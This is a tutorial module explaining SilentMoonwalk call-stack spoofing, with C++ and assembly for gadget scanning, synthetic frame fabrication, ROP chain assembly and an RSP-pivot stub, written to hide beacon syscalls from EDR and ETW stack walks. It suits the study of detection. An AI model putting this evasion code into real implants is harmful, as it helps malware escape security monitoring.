Module 7: The Full Spoof Engine
Assembling every piece into a complete, walkable, executable spoofed call stack.
The Complete Picture
This module brings together everything from the previous six modules into SilentMoonwalk's end-to-end algorithm. We'll trace the complete lifecycle: from selecting a target call chain, through gadget matching and frame construction, to the actual ROP-driven syscall invocation with a fully spoofed stack. Unlike approaches that only overwrite a single return address, this algorithm aims to produce a stack in which every frame stays consistent with its function's unwind metadata.
High-Level Algorithm Overview
SilentMoonwalk's spoofing engine executes in five phases. Each phase builds on the results of the previous one:
SilentMoonwalk Execution Phases
1. Initialization
2. Chain Selection
3. Frame Fabrication
4. ROP Assembly
5. Execution
Phase 1: Initialization
At startup, SilentMoonwalk scans loaded modules to build its gadget database and function catalog:
```cpp
// Phase 1: One-time initialization
class SpoofEngine {
    GadgetDB gadgets;
    std::vector<FunctionInfo> functionCatalog;
    HMODULE hNtdll = nullptr;
    HMODULE hKernel32 = nullptr;
    HMODULE hKernelBase = nullptr;
    // RUNTIME_FUNCTION entries for the two terminal frames
    PRUNTIME_FUNCTION pBaseThreadInitThunk = nullptr;
    PRUNTIME_FUNCTION pRtlUserThreadStart = nullptr;

public:
    void Initialize() {
        // 1. Get handles to system modules
        hNtdll = GetModuleHandleA("ntdll.dll");
        hKernel32 = GetModuleHandleA("kernel32.dll");
        hKernelBase = GetModuleHandleA("kernelbase.dll");

        // 2. Build gadget database from all system modules
        gadgets.Build(hNtdll);
        gadgets.Build(hKernel32);
        gadgets.Build(hKernelBase);

        // 3. Catalog all functions with their frame sizes
        CatalogFunctions(hNtdll);
        CatalogFunctions(hKernel32);
        CatalogFunctions(hKernelBase);

        // 4. Identify critical termination frames
        //    Every thread stack ends with these two frames
        resolveTerminalFrames();
    }

private:
    void resolveTerminalFrames() {
        // All Windows threads have this at the bottom of their stack
        // (the exact offsets vary between Windows builds):
        //   kernel32!BaseThreadInitThunk+0x14
        //   ntdll!RtlUserThreadStart+0x21
        // We need the RUNTIME_FUNCTION for each to compute
        // their exact frame sizes for the synthetic chain.
        DWORD64 imgBase = 0;
        pBaseThreadInitThunk = RtlLookupFunctionEntry(
            (DWORD64)GetProcAddress(hKernel32, "BaseThreadInitThunk"),
            &imgBase, NULL
        );
        pRtlUserThreadStart = RtlLookupFunctionEntry(
            (DWORD64)GetProcAddress(hNtdll, "RtlUserThreadStart"),
            &imgBase, NULL
        );
    }
};
```
Phase 2: Call Chain Selection
When a spoofed call is requested, SilentMoonwalk selects a realistic call chain. The chain must be plausible for the type of API being called. For example, a thread sleeping via NtWaitForSingleObject should show a chain involving the Sleep family of functions:
```cpp
// Phase 2: Select a plausible call chain for the target syscall
struct CallChainSpec {
    PVOID targetApi;                  // The actual API to call
    std::vector<PVOID> spoofedChain;  // Functions to appear on stack
};

CallChainSpec SelectCallChain(PVOID targetApi) {
    CallChainSpec spec;
    spec.targetApi = targetApi;

    // Build a realistic chain ending at the standard thread entry
    // For NtWaitForSingleObject, a typical chain might be:
    //
    //   NtWaitForSingleObject            (the syscall itself)
    //   KERNELBASE!WaitForSingleObjectEx (wrapper that calls Nt*)
    //   kernel32!SleepEx                 (high-level sleep function)
    //   kernel32!Sleep                   (simplest sleep wrapper)
    //   <application function>           (we skip this - too specific)
    //   kernel32!BaseThreadInitThunk     (standard thread entry)
    //   ntdll!RtlUserThreadStart         (thread bootstrap)
    spec.spoofedChain = {
        GetProcAddress(hKernelBase, "WaitForSingleObjectEx"),
        GetProcAddress(hKernel32, "SleepEx"),
        GetProcAddress(hKernel32, "Sleep"),
        GetProcAddress(hKernel32, "BaseThreadInitThunk"),
        GetProcAddress(hNtdll, "RtlUserThreadStart")
    };
    return spec;
}
```
Chain Plausibility
The spoofed chain should represent a realistic call path. An EDR might cross-reference the chain to verify that function A actually calls function B in its code. SilentMoonwalk selects functions from known call paths in the Windows API. This module uses Sleep → SleepEx → WaitForSingleObjectEx → NtWaitForSingleObject as its running example for sleeping beacons. Treat it as illustrative and verify each caller/callee link against the target Windows build: on current builds, for instance, SleepEx reaches NtDelayExecution rather than WaitForSingleObjectEx.
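Seen from the inspecting side, the cross-reference described above can be approximated by checking that a return address is immediately preceded by a CALL whose target is the claimed callee. The following is a minimal sketch over a plain byte buffer, not code from SilentMoonwalk or from any EDR: `IsDirectCallTo` and `MakeToyImage` are hypothetical names, only the direct `E8 rel32` encoding is handled (indirect calls through import tables are ignored), and a little-endian host is assumed.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical helper: returns true when the 5 bytes before `retOffset`
// encode `call rel32` (opcode E8) whose target is `calleeOffset`.
// All offsets are relative to the start of `image`.
bool IsDirectCallTo(const std::vector<uint8_t>& image,
                    size_t retOffset, size_t calleeOffset) {
    if (retOffset < 5 || retOffset > image.size()) return false;
    if (image[retOffset - 5] != 0xE8) return false;

    int32_t rel = 0;
    std::memcpy(&rel, &image[retOffset - 4], sizeof(rel));

    // Call target = address of the next instruction + signed displacement.
    int64_t target = static_cast<int64_t>(retOffset) + rel;
    return target == static_cast<int64_t>(calleeOffset);
}

// Builds a toy "image": NOP padding with one call at offset 0x10
// that targets offset 0x30 and returns to offset 0x15.
std::vector<uint8_t> MakeToyImage() {
    std::vector<uint8_t> image(0x40, 0x90);
    image[0x10] = 0xE8;
    int32_t rel = 0x30 - 0x15;
    std::memcpy(&image[0x11], &rel, sizeof(rel));
    return image;
}
```

With the toy image, `IsDirectCallTo(image, 0x15, 0x30)` holds, while a return address that does not follow a call, or a call that targets a different function, fails the check. A spoofed return address therefore has to sit after a real call site to pass this kind of inspection.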
Phase 3: Frame Fabrication
With the call chain selected, SilentMoonwalk computes the frame size for each function and allocates the synthetic stack space:
```cpp
// Phase 3: Compute frame sizes and build synthetic frame map
struct SyntheticFrame {
    PRUNTIME_FUNCTION pFunc;
    PUNWIND_INFO pUnwind;
    DWORD frameSize;    // Allocation + pushes
    DWORD totalSize;    // Including return address slot
    PVOID returnAddr;   // Points into next function in chain
    DWORD stackOffset;  // Offset from synthetic stack base
    std::vector<RegisterSave> savedRegs;  // Non-volatile reg saves
};

std::vector<SyntheticFrame> FabricateFrames(CallChainSpec& spec) {
    std::vector<SyntheticFrame> frames;
    DWORD totalStackNeeded = 0;

    for (size_t i = 0; i < spec.spoofedChain.size(); i++) {
        SyntheticFrame sf;
        DWORD64 imageBase = 0;

        // Look up the RUNTIME_FUNCTION for this chain entry
        sf.pFunc = RtlLookupFunctionEntry(
            (DWORD64)spec.spoofedChain[i], &imageBase, NULL
        );
        if (sf.pFunc == NULL) {
            // No unwind data (e.g., a leaf function): this frame cannot be modeled
            return {};
        }
        sf.pUnwind = (PUNWIND_INFO)(imageBase + sf.pFunc->UnwindData);
        sf.frameSize = ComputeFrameSize(sf.pUnwind);
        sf.totalSize = sf.frameSize + 8;  // +8 for return address

        // Determine return address: point into the NEXT function
        if (i + 1 < spec.spoofedChain.size()) {
            // The next function may live in a different module,
            // so resolve it against its own image base
            DWORD64 nextImageBase = 0;
            PRUNTIME_FUNCTION pNext = RtlLookupFunctionEntry(
                (DWORD64)spec.spoofedChain[i + 1], &nextImageBase, NULL
            );
            sf.returnAddr = FindReturnAddress(pNext, nextImageBase);
        } else {
            sf.returnAddr = NULL;  // Terminal frame
        }

        // Parse saved register locations from unwind codes
        sf.savedRegs = ParseRegisterSaves(sf.pUnwind);
        sf.stackOffset = totalStackNeeded;
        totalStackNeeded += sf.totalSize;
        frames.push_back(sf);
    }
    return frames;
}
```
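The frame-size step relies on a helper the listing above does not show. As a rough sketch of what such a helper has to do, the code below sums the stack bytes described by a function's unwind codes, following the documented x64 `UNWIND_CODE` layout. It works on raw 16-bit slots instead of the Windows structures so it can be compiled anywhere; `ComputeFrameSizeFromCodes` is a hypothetical stand-in for `ComputeFrameSize`, chained unwind info is not followed, and functions that establish a frame pointer (`UWOP_SET_FPREG`) would need extra handling that is omitted here.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Unwind operation codes from the documented x64 UNWIND_CODE format.
enum : uint8_t {
    UWOP_PUSH_NONVOL = 0, UWOP_ALLOC_LARGE = 1, UWOP_ALLOC_SMALL = 2,
    UWOP_SET_FPREG = 3, UWOP_SAVE_NONVOL = 4, UWOP_SAVE_NONVOL_FAR = 5,
    UWOP_SAVE_XMM128 = 8, UWOP_SAVE_XMM128_FAR = 9, UWOP_PUSH_MACHFRAME = 10
};

// Each slot is one UNWIND_CODE read as a little-endian 16-bit value:
// bits 0-7 = prologue offset, bits 8-11 = operation, bits 12-15 = op info.
// Returns the number of stack bytes the prologue consumes, or 0 on
// malformed input.
uint32_t ComputeFrameSizeFromCodes(const std::vector<uint16_t>& slots) {
    uint32_t size = 0;
    for (size_t i = 0; i < slots.size();) {
        uint8_t op = (slots[i] >> 8) & 0xF;
        uint8_t info = (slots[i] >> 12) & 0xF;
        size_t extra = 0;  // additional slots consumed by this operation
        switch (op) {
        case UWOP_PUSH_NONVOL:
            size += 8;
            break;
        case UWOP_ALLOC_SMALL:
            size += info * 8u + 8u;
            break;
        case UWOP_ALLOC_LARGE:
            extra = (info == 0) ? 1 : 2;
            if (i + extra >= slots.size()) return 0;
            if (info == 0) size += slots[i + 1] * 8u;  // scaled 16-bit size
            else size += slots[i + 1] | (uint32_t(slots[i + 2]) << 16);
            break;
        case UWOP_SET_FPREG:
            break;  // does not change the allocation total
        case UWOP_SAVE_NONVOL:
        case UWOP_SAVE_XMM128:
            extra = 1;  // save location only, no allocation
            break;
        case UWOP_SAVE_NONVOL_FAR:
        case UWOP_SAVE_XMM128_FAR:
            extra = 2;
            break;
        case UWOP_PUSH_MACHFRAME:
            size += info ? 48 : 40;
            break;
        default:
            return 0;
        }
        i += 1 + extra;
    }
    return size;
}
```

For a prologue of `push rbx` followed by `sub rsp, 0x20`, the unwind codes are `{0x3206, 0x3002}` and the computed size is 0x28 bytes. Adding the 8-byte return address slot gives the `totalSize` used in the listing.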
Phase 4: ROP Chain Assembly
This is the most complex phase. The synthetic frame data must simultaneously serve as a valid ROP chain for execution AND a valid unwind chain for inspection. SilentMoonwalk weaves gadget addresses into the frame data at positions that are both reachable during ROP execution and benign during unwinding:
```cpp
// Phase 4: Assemble the dual-purpose stack layout
void AssembleRopChain(
    PBYTE syntheticStack,
    std::vector<SyntheticFrame>& frames,
    PVOID targetApi,
    PVOID targetApiArgs[4],  // RCX, RDX, R8, R9
    PVOID rbxTrampoline      // Pointer to memory holding targetApi addr
) {
    DWORD offset = 0;

    // === STAGE A: Parameter setup (before the spoofed frames) ===
    // Place POP gadgets to load API arguments into registers
    // These execute first in the ROP chain

    // pop rcx; ret -- loads first argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popRcx;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[0];  // RCX value
    offset += 8;

    // pop rdx; ret -- loads second argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popRdx;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[1];  // RDX value
    offset += 8;

    // pop r8; ret -- loads third argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popR8;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[2];  // R8 value
    offset += 8;

    // pop r9; ret -- loads fourth argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popR9;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[3];  // R9 value
    offset += 8;

    // === STAGE B: JMP [RBX] trampoline ===
    // RBX was set up earlier to point to memory containing targetApi addr
    // The JMP transfers control WITHOUT pushing a return address
    *(PVOID*)(syntheticStack + offset) = gadgets.jmpRbx;
    offset += 8;

    // === STAGE C: Fake return address ===
    // When targetApi executes RET, it pops this address.
    // This is where the spoofed stack begins from the unwinder's view.
    // It points into the first function in our spoofed chain.
    *(PVOID*)(syntheticStack + offset) = frames[0].returnAddr;
    offset += 8;

    // === STAGE D: Synthetic frames ===
    // Each frame occupies exactly the right number of bytes
    for (size_t i = 0; i < frames.size(); i++) {
        SyntheticFrame& sf = frames[i];

        // Fill frame body with plausible data
        // The local variable area can contain recovery gadgets
        FillFrameBody(syntheticStack + offset, sf);

        // Place saved register values at correct offsets
        for (auto& reg : sf.savedRegs) {
            *(DWORD64*)(syntheticStack + offset + reg.stackOffset) =
                GeneratePlausibleRegValue(hNtdll, hKernel32);
        }

        // Place return address at end of frame
        *(PVOID*)(syntheticStack + offset + sf.frameSize) = sf.returnAddr;
        offset += sf.totalSize;
    }
}
```
The Dual-Purpose Challenge
The synthetic buffer serves double duty. During ROP execution, RSP advances through the parameter setup gadgets until the JMP [RBX] trampoline transfers control to the target API. During stack unwinding (triggered by an EDR, for example), the unwinder starts at the first spoofed return address and walks toward higher addresses one frame at a time, using each function's unwind metadata to locate the next return address. These two traversals operate on overlapping but different portions of the stack data, which is why careful offset calculation is essential.
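To make the unwinder's traversal concrete, the following sketch models a stack as an array of 8-byte slots and walks it the way an unwinder would: read a return address, look up the frame size of the function that contains it, skip that many bytes, and repeat. It is a simplified model under stated assumptions. `FrameSizeMap` is a hypothetical stand-in for the function-table lookup plus unwind-code parsing, and the addresses and sizes in `DemoTrace` are made up for illustration.

```cpp
#include <cstddef>
#include <cstdint>
#include <map>
#include <vector>

// Hypothetical model: maps a return address to the frame size (in bytes,
// excluding the return address slot) of the function that contains it.
using FrameSizeMap = std::map<uint64_t, uint32_t>;

// Walks `stack` (8-byte slots, index 0 = lowest address) starting at the
// slot holding the first return address. Returns the addresses visited.
std::vector<uint64_t> WalkStack(const std::vector<uint64_t>& stack,
                                size_t firstRetSlot,
                                const FrameSizeMap& sizes) {
    std::vector<uint64_t> trace;
    size_t slot = firstRetSlot;
    while (slot < stack.size()) {
        uint64_t ret = stack[slot];
        auto it = sizes.find(ret);
        if (ret == 0 || it == sizes.end()) break;  // end of chain or unknown code
        trace.push_back(ret);
        // Skip the return address slot, then the frame body of the function
        // containing `ret`, to reach the next (older) return address.
        slot += 1 + it->second / 8;
    }
    return trace;
}

std::vector<uint64_t> DemoTrace() {
    FrameSizeMap sizes = {{0x1000, 0x10}, {0x2000, 0x08}};
    // slot 0: ret 0x1000 | slots 1-2: frame body | slot 3: ret 0x2000
    // slot 4: frame body | slot 5: 0 (end of chain)
    std::vector<uint64_t> stack = {0x1000, 0xAA, 0xBB, 0x2000, 0xCC, 0};
    return WalkStack(stack, 0, sizes);
}
```

The walk only stays on track when each frame body has exactly the size the metadata reports. If a frame is off by a single slot, the next value read as a return address is frame data and the walk stops or yields a nonsensical address, which is also how a truncated or inconsistent stack becomes visible to an inspector.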
Phase 5: Execution
With the synthetic stack fully assembled, SilentMoonwalk pivots RSP to the synthetic stack and begins the ROP chain. This is done via an assembly stub:
```asm
; SilentMoonwalk's execution stub (simplified)
; Called from C++ with the synthetic stack address in RCX
SpoofAndCall PROC
    ; Save all non-volatile registers (callee-saved)
    push rbp
    push rbx
    push rdi
    push rsi
    push r12
    push r13
    push r14
    push r15

    ; Save the real RSP so we can restore it later
    mov r15, rsp            ; R15 = real stack pointer (saved)

    ; Set up RBX for the JMP [RBX] trampoline
    ; RCX = pointer to struct { PVOID pTargetApi; BYTE syntheticStack[...]; }
    lea rbx, [rcx]          ; RBX = pointer to target API address

    ; Pivot RSP to the synthetic stack
    ; The ROP chain starts at offset 8 in the synthetic buffer
    lea rsp, [rcx + 8]      ; RSP now points to our ROP chain

    ; Begin ROP execution:
    ;   RSP -> [pop rcx gadget addr]
    ;          [RCX value]
    ;          [pop rdx gadget addr]
    ;          [RDX value]
    ;          ... (parameter setup)
    ;          [JMP [RBX] gadget addr]
    ;
    ; The first RET pops and jumps to pop rcx gadget.
    ; Each gadget's RET chains to the next.
    ; JMP [RBX] transfers to the target API.
    ; Target API's RET lands on our spoofed return address.
    ret                     ; Start the ROP chain!

    ; === Recovery point ===
    ; After the target API returns through the spoofed chain,
    ; a recovery gadget redirects execution here
RecoveryPoint:
    ; Restore real RSP
    mov rsp, r15

    ; Restore non-volatile registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop rsi
    pop rdi
    pop rbx
    pop rbp
    ret                     ; Return to caller with spoofed call complete
SpoofAndCall ENDP
```
The Recovery Mechanism
After the target API returns through the spoofed stack frames, execution must return to the real code. SilentMoonwalk embeds a recovery gadget address within the synthetic frames. When the return chain reaches that address, it redirects execution back to the recovery point:
```cpp
// The recovery mechanism:
// 1. Target API (e.g., NtWaitForSingleObject) returns
// 2. Its RET pops the first spoofed return address from the stack
// 3. Execution resumes at the code that address points to
// 4. That code is an ADD RSP, N; RET gadget that advances RSP
//    through the frame body to the next return address
// 5. This chain continues through each synthetic frame
// 6. The last frame's return address points to the RecoveryPoint
//    in the assembly stub
// 7. Execution returns to the real caller with the original RSP

// Alternatively, a simpler recovery approach:
// The first spoofed return address can directly point to a
// gadget that restores RSP from a saved register (e.g., R15):
//     mov rsp, r15
//     ret
// This immediately collapses the synthetic stack and returns
// to the real code. However, this gadget is harder to find
// with valid unwind metadata.
```
Handling the Syscall Boundary
For direct syscalls (where the beacon invokes the syscall instruction directly rather than calling through ntdll), SilentMoonwalk must ensure the synthetic stack is already in place at the exact moment the syscall instruction executes. Kernel-side telemetry such as ETW stack capture can walk the user-mode stack while the syscall is being serviced, so whatever RSP points to at syscall entry is what gets inspected:
```cpp
// For direct syscall invocation with spoofed stack:
// The synthetic stack must be in place BEFORE the syscall instruction.
//
// Approach:
//   1. Build synthetic stack as above, then either
//   2. Place the syscall stub (mov r10, rcx; mov eax, SSN; syscall)
//      at the end of the ROP chain, OR
//   3. Use the JMP [RBX] gadget to jump to ntdll's syscall stub
//      (the actual 'syscall' instruction inside ntdll)
//
// Option 3 is preferred because:
//   - The return address on the stack (pushed by nothing - we used JMP)
//     is our spoofed address pointing into a legitimate function
//   - The kernel sees RSP pointing to our synthetic stack
//   - ETW stack capture walks our synthetic frames correctly
//   - The syscall instruction itself is inside ntdll (legitimate location)
```
The Elegance of JMP-Based Syscalls
By using JMP [RBX] to reach ntdll's syscall stub instead of CALL, SilentMoonwalk avoids pushing any return address. The stack at the moment of syscall execution contains only the synthetic frames. The kernel's ETW stack walker processes these frames using RtlVirtualUnwind and sees a call chain that is consistent with each function's unwind data. This is why JMP [RBX] is the linchpin of the entire technique.
Complete Data Flow
Here is the complete data dependency between all components:
| Component | Inputs | Outputs | Consumed By |
|---|---|---|---|
| Module Scanner | ntdll, kernel32, kernelbase .pdata | Function catalog + UNWIND_INFO | Gadget search, frame fabrication |
| Gadget Scanner | .text sections, RUNTIME_FUNCTIONs | Gadget database (indexed by type/size) | ROP chain assembly |
| Chain Selector | Target API identity | Ordered list of spoofed functions | Frame fabrication |
| Frame Fabricator | Chain spec + UNWIND_INFOs | Frame sizes, register save maps, return addrs | ROP assembly |
| ROP Assembler | Gadgets + frames + API args | Synthetic stack buffer | Execution stub |
| Execution Stub | Synthetic stack + RSP pivot | API call with spoofed stack | Target API |
Pop Quiz: The Full Spoof Engine
Q1: Why does SilentMoonwalk use JMP [RBX] to invoke the target API instead of CALL?
Q2: What are the "terminal frames" that every spoofed chain must end with?
Q3: How does SilentMoonwalk return to the real caller after the target API completes?